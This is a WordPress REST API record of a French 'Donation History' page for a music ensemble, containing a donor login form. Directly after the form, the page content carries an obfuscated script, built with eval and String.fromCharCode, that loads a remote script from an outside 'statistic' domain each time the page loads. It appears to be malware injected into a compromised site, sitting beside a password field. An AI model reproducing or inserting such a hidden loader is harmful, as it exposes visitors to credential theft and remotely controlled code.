{"id":254,"date":"2020-09-10T13:39:08","date_gmt":"2020-09-10T13:39:08","guid":{"rendered":"http:\/\/www.ensemble-la-chimera.com\/donation-history\/"},"modified":"2020-09-10T13:39:08","modified_gmt":"2020-09-10T13:39:08","slug":"donation-history","status":"publish","type":"page","link":"https:\/\/www.ensemble-la-chimera.com\/fr\/donation-history\/","title":{"rendered":"Donation History"},"content":{"rendered":"<p><div class=\"give_notices give_errors\" id=\"give_error_warning\">\n\t\t\t\t\t\t<p class=\"give_notice give_warning\" data-dismissible=\"\" data-dismiss-interval=\"5000\" data-dismiss-type=\"\">\n\t\t\t\t\t\t\tVous devez \u00eatre connect\u00e9 pour voir votre historique de don. Veuillez vous connecter en utilisant votre compte ou en vous en cr\u00e9ant un en utilisant la m\u00eame adresse de messagerie utilis\u00e9e pour votre don.\n\t\t\t\t\t\t<\/p>\n\t\t\t\t\t\t\n\t\t\t\t\t<\/div>\t<form id=\"give-login-form\" class=\"give-form\" action=\"\" method=\"post\" data-trp-original-action=\"\">\n\t\t<fieldset>\n\t\t\t<legend>Connectez-vous<\/legend>\n\t\t\t\t\t\t<div class=\"give-login-username give-login\">\n\t\t\t\t<label for=\"give_user_login\">Identifiant ou adresse de messagerie<\/label>\n\t\t\t\t<input name=\"give_user_login\" id=\"give_user_login\" class=\"give-required give-input\" type=\"text\" required aria-required=\"true\" \/>\n\t\t\t<\/div>\n\n\t\t\t<div class=\"give-login-password give-login\">\n\t\t\t\t<label for=\"give_user_pass\">Mot de passe<\/label>\n\t\t\t\t<input name=\"give_user_pass\" id=\"give_user_pass\" class=\"give-password give-required give-input\" type=\"password\" required aria-required=\"true\" \/>\n\t\t\t<\/div>\n\n\t\t\t<div class=\"give-login-submit give-login\">\n\t\t\t\t<input type=\"hidden\" name=\"give_login_redirect\" value=\"https:\/\/www.ensemble-la-chimera.com\/fr\/donor-dashboard-3\/?give-login-success=true\" \/>\n\t\t\t\t<input type=\"hidden\" name=\"give_login_nonce\" value=\"da1796e022\" \/>\n\t\t\t\t<input type=\"hidden\" name=\"give_action\" value=\"user_login\" \/>\n\t\t\t\t<input id=\"give_login_submit\" type=\"submit\" class=\"give_submit\" value=\"Se connecter\" \/>\n\t\t\t<\/div>\n\n\t\t\t<div class=\"give-lost-password give-login\">\n\t\t\t\t<a href=\"https:\/\/www.ensemble-la-chimera.com\/fr\/chica1961\/?action=lostpassword\">\n\t\t\t\t\tR\u00e9initialiser le mot de passe\t\t\t\t<\/a>\n\t\t\t<\/div>\n\t\t\t\t\t<\/fieldset>\n\t<input type=\"hidden\" name=\"trp-form-language\" value=\"fr\"\/><\/form>\n\t<script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"give_campaign_id":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-254","page","type-page","status-publish","hentry"],"campaignId":"","_links":{"self":[{"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/pages\/254","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/comments?post=254"}],"version-history":[{"count":0,"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/pages\/254\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ensemble-la-chimera.com\/fr\/wp-json\/wp\/v2\/media?parent=254"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}